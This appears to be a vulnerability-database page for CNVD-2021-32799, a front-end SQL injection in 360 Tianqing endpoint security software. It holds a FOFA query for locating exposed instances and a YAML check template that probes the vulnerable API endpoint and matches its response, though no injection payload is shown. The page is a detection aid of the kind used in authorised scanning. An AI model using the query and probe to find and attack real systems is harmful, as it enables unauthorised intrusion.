CNVD-2021-32799: 天擎终端安全管理系统前台 SQL 注入漏洞

2025-08-01 天擎终端安全管理系统 PoC Public

Description

天擎前台SQL注入

fofa: app="360天擎终端安全管理系统"

进一步利用/验证方法,参考下面 reference 链接

PoC

id: CNVD-2021-32799

info:
  name: 天擎终端安全管理系统前台 SQL 注入漏洞
  author: 你是猪
  severity: high
  description: |
    天擎前台SQL注入
    fofa: app="360天擎终端安全管理系统"
    进一步利用/验证方法,参考下面 reference 链接
  reference:
    - https://blog.51cto.com/u_9691128/4295047
    - https://www.cnvd.org.cn/patchInfo/show/270651
  tags: cnvd,cnvd2021,sqli
  created: 2021/10/23

rules:
  r0:
    request:
      method: GET
      path: /api/dp/rptsvcsyncpoint?ccid=1
    expression: response.status == 200 && response.body.bcontains(b'"reason":') && response.body.bcontains(b'"success"') && response.body.bcontains(b'"antiadwa":') && response.body.bcontains(b'"clientupgrade":')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities